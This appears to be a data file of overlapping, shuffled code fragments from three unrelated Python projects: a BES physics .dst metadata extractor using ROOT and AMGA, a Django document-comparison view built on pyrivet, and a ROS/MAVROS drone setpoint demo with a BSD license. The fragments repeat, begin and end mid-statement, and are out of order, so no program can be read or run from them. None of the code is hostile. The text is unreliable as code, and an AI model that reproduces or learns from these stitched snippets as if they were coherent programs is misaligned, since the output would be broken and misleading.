"self.format = format def __str__(self): return repr(\"the File's format is not \",self.format) #type",
"== result[0]: return True return False #judge format of file class JudgeFormat(Exception): def",
"of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name of each",
"return runId else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"]",
"<=> value of Description is null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"]",
"getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of Data/All,their",
"filename,runL = runH = %d,but runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return",
"print \"Error %s:runL in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get",
"{} runIds = [] #change the .dst file to .root file rootfile =",
"dst file has several runIds,get them from JobOptions by calling getRunIdList function result",
"= expNumList[0] else: #if including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str",
"status is null #-1 <=> value of streamId is null #null <=> value",
"flag==0: raise JudgeFormat(format) return #split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1]",
"is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename attributes[\"streamId\"] =",
"os.path import ROOT from ROOT import gROOT from amga import mdclient,mdinterface import string",
"# author: linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim &",
"\"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in filename is same",
"result = {} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 =",
"{} expRes = {} runIds = [] #change the .dst file to .root",
"'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file",
"by calling getFileSize function #get name by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile)",
"format in srcformat: #if format of file is in srcformat if file.endswith(format): flag",
"of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new file naming",
"ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst'",
"= re.compile(r\"\\d+\") res = format.search(expNum) if res is not None: return res.group() #Get",
"name by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst",
"resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information",
"attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get",
"name of each entry if eventType == result[0]: return True return False #judge",
"whether between runfrm and runto of each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto:",
"= getExpRes(runIds) if expRes == False: print \"Can't get expNum and resonance of",
"return \"error\" else: #this dst file has several runIds,get them from JobOptions by"
] |
[
"document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError: latest_comparisons",
"= sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons()",
"document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex:",
"= 'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', {",
"lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a,",
"import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet # Create your",
"*= 2.2 r = int(r * 100) return render(request, 'rivet/comparison.html', {'comparison': c, 'result':",
"do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else:",
"HttpResponse from django.core.urlresolvers import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon",
"cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000,",
"import rivet # Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request):",
"ingest=True) else: result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b,",
"Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons()",
"comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55 r *=",
"pyrivet_core import rivet # Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def",
"comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55 r",
"result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r",
"try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError:",
"Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8) as",
"def index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output =",
"def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons':",
"'error_message': \"Bad Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing",
"document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp =",
"<reponame>DruidGreeneyes/rivet_site<gh_stars>0 from django.shortcuts import render, get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers",
"document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError: latest_comparisons =",
"django.core.urlresolvers import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core",
"= { 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context) return output def",
"Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet # Create your views",
"import render, get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from",
"= render(request, 'rivet/index.html', context) return output def submit(request): try: document_a, document_b = sorted((request.POST['doca'],",
"if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True)",
"= Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8)",
"= Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c =",
"latest_comparisons, } output = render(request, 'rivet/index.html', context) return output def submit(request): try: document_a,",
"output = render(request, 'rivet/index.html', context) return output def submit(request): try: document_a, document_b =",
"django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models import Comparison from",
"else: result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result)",
"rivet # Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons",
"your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context",
"'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons':",
"as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b)",
"0.55 r *= 2.2 r = int(r * 100) return render(request, 'rivet/comparison.html', {'comparison':",
"= get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else:",
"index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output = render(request,",
"result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save()",
"Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison,",
"return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result",
"nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a,",
"views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context =",
"= c.result r -= 0.55 r *= 2.2 r = int(r * 100)",
"submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except",
"get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context) return",
"get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55 r *= 2.2 r =",
"Lexicon from pyrivet_core import rivet # Create your views here. def get_latest_comparisons(num=5): return",
"get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models import",
"return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, }",
"reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet",
"Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \")",
"print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a,",
"r -= 0.55 r *= 2.2 r = int(r * 100) return render(request,",
"r *= 2.2 r = int(r * 100) return render(request, 'rivet/comparison.html', {'comparison': c,",
"import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import",
"'rivet/index.html', context) return output def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep",
"'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context) return output def submit(request): try:",
"= result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request,",
"KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\"",
"latest_comparisons, 'error_message': \"Bad Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist:",
"context) return output def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep =",
"Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result =",
"= get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55 r *= 2.2 r",
"def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST",
"Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result =",
"in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons,",
"here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context = {",
"cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r =",
"pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet # Create your views here. def",
"\") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex,",
".models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet # Create",
"render, get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models",
"document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,)))",
"request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request,",
"result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def",
"rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp",
"= rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result = result[0][1]",
"from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet # Create your views here.",
"latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" })",
"= rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return",
"= get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context)",
"document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id)",
"django.shortcuts import render, get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse",
"Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output",
"try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with",
"'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a,",
"from django.shortcuts import render, get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import",
"result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id):",
"}) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if",
"get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else: try:",
"def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55",
"request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message':",
"2.2 r = int(r * 100) return render(request, 'rivet/comparison.html', {'comparison': c, 'result': r})",
"\"Bad Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents:",
"r = c.result r -= 0.55 r *= 2.2 r = int(r *",
"else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep:",
"-= 0.55 r *= 2.2 r = int(r * 100) return render(request, 'rivet/comparison.html',",
"# Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons =",
"import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon",
"{ 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context) return output def submit(request):",
"from pyrivet_core import rivet # Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num]",
"c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55 r *= 2.2",
"context = { 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context) return output",
"HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import",
"render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else: try: cmp =",
"from django.core.urlresolvers import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from",
"get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons,",
"except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad",
"lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result",
"latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html',",
"pk=comparison_id) r = c.result r -= 0.55 r *= 2.2 r = int(r",
"from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models import Comparison",
"with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result",
"except Comparison.DoesNotExist: print(\"Comparing documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result",
"return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else: try: cmp",
"'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except",
"return output def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep'",
"do_deep = 'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html',",
"{ 'latest_comparisons': latest_comparisons, 'error_message': \"Bad Input!\" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b)",
"c.result r -= 0.55 r *= 2.2 r = int(r * 100) return",
"cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c",
"rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison',",
"} output = render(request, 'rivet/index.html', context) return output def submit(request): try: document_a, document_b",
"import Lexicon from pyrivet_core import rivet # Create your views here. def get_latest_comparisons(num=5):",
"from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet #",
"args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r -=",
"render(request, 'rivet/index.html', context) return output def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb']))",
"sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return",
"result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result =",
"documents: \") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b,",
"output def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in",
"HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r"
] |
[
"Redistributions in binary form must reproduce the above copyright # * notice, this",
"# * # **************************************************************************** import rospy import thread import threading import time from",
"0 while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x y =",
"et: # # # **************************************************************************** # * # * Copyright (c) 2015 UAVenture",
"THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING",
"std_msgs.msg import Header from std_msgs.msg import String from tf.transformations import quaternion_from_euler class Setpoint:",
"rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z",
"offset_y z = offset_z wait = False delay = 0 if (i ==",
"of conditions and the following disclaimer. # * 2. Redistributions in binary form",
"< 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z) <",
"# * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT",
"IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR PURPOSE ARE",
"from geometry_msgs.msg import PoseStamped, Quaternion from math import * from mavros.srv import CommandBool",
"without # * modification, are permitted provided that the following conditions # *",
"# * POSSIBILITY OF SUCH DAMAGE. # * # **************************************************************************** import rospy import",
"radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self,",
"= pub self.rospy = rospy self.x = 0.0 self.y = 0.0 self.z =",
"0.0, 8.0, 5) print \"Fly to the right\" setpoint.set(10.0, 4.0, 8.0, 5) print",
"= x self.y = y self.z = z if wait: rate = rospy.Rate(5)",
"rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x",
"BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # *",
"ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY, OR TORT",
"Header from std_msgs.msg import String from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self,",
"IN # * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN",
"y self.z = z if wait: rate = rospy.Rate(5) while not self.done: rate.sleep()",
"self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if",
"For demo purposes we will lock yaw/heading to north. yaw_degrees = 0 #",
"AG. All rights reserved. # * Author: <NAME> <<EMAIL>> # * # *",
"0.0 try: thread.start_new_thread( self.navigate, () ) except: print \"Error: Unable to start thread\"",
"contributors may be # * used to endorse or promote products derived from",
"- self.z) < 0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local',",
"queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0,",
"print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to the right\" setpoint.set(10.0, 4.0,",
"= 0.0 offset_z = 10.0 sides = 360 radius = 20 print \"Fly",
"* Redistribution and use in source and binary forms, with or without #",
"it reach the setpoint. wait = True delay = 5 setpoint.set(x, y, z,",
"IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS IS\" AND",
"offset_x = 0.0 offset_y = 0.0 offset_z = 10.0 sides = 360 radius",
"lock yaw/heading to north. yaw_degrees = 0 # North yaw = radians(yaw_degrees) quaternion",
"ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #",
"* notice, this list of conditions and the following disclaimer in # *",
"setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to the left\" setpoint.set(0.0, 0.0, 8.0, 5)",
"setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0,",
"True delay = 5 setpoint.set(x, y, z, delay, wait) i = i +",
"NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY WAY OUT OF THE USE",
"import time from geometry_msgs.msg import PoseStamped, Quaternion from math import * from mavros.srv",
"NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # * OF",
"2. Redistributions in binary form must reproduce the above copyright # * notice,",
"0.0 offset_z = 10.0 sides = 360 radius = 20 print \"Fly in",
"msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z =",
"2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2,",
"rospy): self.pub = pub self.rospy = rospy self.x = 0.0 self.y = 0.0",
"quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z,",
"wait=True): self.done = False self.x = x self.y = y self.z = z",
"8.0, 5) print \"Fly to the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x =",
"= quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y,",
"= i + 1 rate.sleep() if (i > sides): print \"Fly home\" setpoint.set(0.0,",
"0 or i == sides): # Let it reach the setpoint. wait =",
"# * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS",
"OF SUCH DAMAGE. # * # **************************************************************************** import rospy import thread import threading",
"self.y = y self.z = z if wait: rate = rospy.Rate(5) while not",
"# * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT",
"OF LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE",
"z if wait: rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self,",
"EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT OF",
"OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON ANY THEORY",
"Let it reach the setpoint. wait = True delay = 5 setpoint.set(x, y,",
"# * without specific prior written permission. # * # * THIS SOFTWARE",
"sin(i*2*pi/sides) + offset_y z = offset_z wait = False delay = 0 if",
"documentation and/or other materials provided with the # * distribution. # * 3.",
"threading import time from geometry_msgs.msg import PoseStamped, Quaternion from math import * from",
"# * 3. Neither the name PX4 nor the names of its contributors",
"if (i > sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break #",
"STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #",
"OF THE # * POSSIBILITY OF SUCH DAMAGE. # * # **************************************************************************** import",
"* the documentation and/or other materials provided with the # * distribution. #",
"DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON ANY",
"try: thread.start_new_thread( self.navigate, () ) except: print \"Error: Unable to start thread\" #",
"* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # *",
"delay = 5 setpoint.set(x, y, z, delay, wait) i = i + 1",
"radius * cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides) + offset_y z",
"to start thread\" # TODO(simon): Clean this up. self.done = False self.done_evt =",
"landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2)",
"0 if (i == 0 or i == sides): # Let it reach",
"== sides): # Let it reach the setpoint. wait = True delay =",
"* 1. Redistributions of source code must retain the above copyright # *",
"import * from std_msgs.msg import Header from std_msgs.msg import String from tf.transformations import",
"* 2. Redistributions in binary form must reproduce the above copyright # *",
"- self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done = True",
"**************************************************************************** import rospy import thread import threading import time from geometry_msgs.msg import PoseStamped,",
"* \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #",
"to the starting height first i = 0 while not rospy.is_shutdown(): x =",
"import threading import time from geometry_msgs.msg import PoseStamped, Quaternion from math import *",
") except: print \"Error: Unable to start thread\" # TODO(simon): Clean this up.",
"are met: # * # * 1. Redistributions of source code must retain",
"AND FITNESS # * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT",
"SOFTWARE, EVEN IF ADVISED OF THE # * POSSIBILITY OF SUCH DAMAGE. #",
"THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS",
"* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # *",
"print \"Fly to the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y",
"self.z) if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5",
"* 3. Neither the name PX4 nor the names of its contributors may",
"* sin(i*2*pi/sides) + offset_y z = offset_z wait = False delay = 0",
"self.rospy = rospy self.x = 0.0 self.y = 0.0 self.z = 0.0 try:",
"while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z = self.z # For",
"FITNESS # * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL",
"# North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion)",
"the following disclaimer in # * the documentation and/or other materials provided with",
"SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS IS\"",
